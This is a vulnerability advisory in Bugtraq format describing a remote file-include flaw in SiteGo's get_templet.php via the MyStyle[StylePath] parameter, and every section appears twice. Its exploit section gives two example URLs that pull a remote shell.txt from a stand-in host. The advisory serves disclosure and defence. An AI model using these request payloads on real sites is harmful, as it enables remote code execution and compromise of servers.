SiteGo 'MyStyle[StylePath]' Parameter Remote File Include Vulnerability
BID:55479
Info
SiteGo 'MyStyle[StylePath]' Parameter Remote File Include Vulnerability
| Bugtraq ID: | 55479 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2012 12:00AM |
| Updated: | Sep 10 2012 12:00AM |
| Credit: | L0n3ly H34rT |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
SiteGo 'MyStyle[StylePath]' Parameter Remote File Include Vulnerability
SiteGo is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
SiteGo is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Exploit / POC
SiteGo 'MyStyle[StylePath]' Parameter Remote File Include Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/site-go/style/green/get_templet.php?MyStyle[StylePath]=http://www.example1.com/shell.txt?
http://www.example.com/site-go/style/blue/get_templet.php?MyStyle[StylePath]=http://www.example1.com/shell.txt?
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/site-go/style/green/get_templet.php?MyStyle[StylePath]=http://www.example1.com/shell.txt?
http://www.example.com/site-go/style/blue/get_templet.php?MyStyle[StylePath]=http://www.example1.com/shell.txt?
Solution / Fix
SiteGo 'MyStyle[StylePath]' Parameter Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
SiteGo 'MyStyle[StylePath]' Parameter Remote File Include Vulnerability
References:
References:
- SiteGo Homepage (Nerpa Productions Graphic)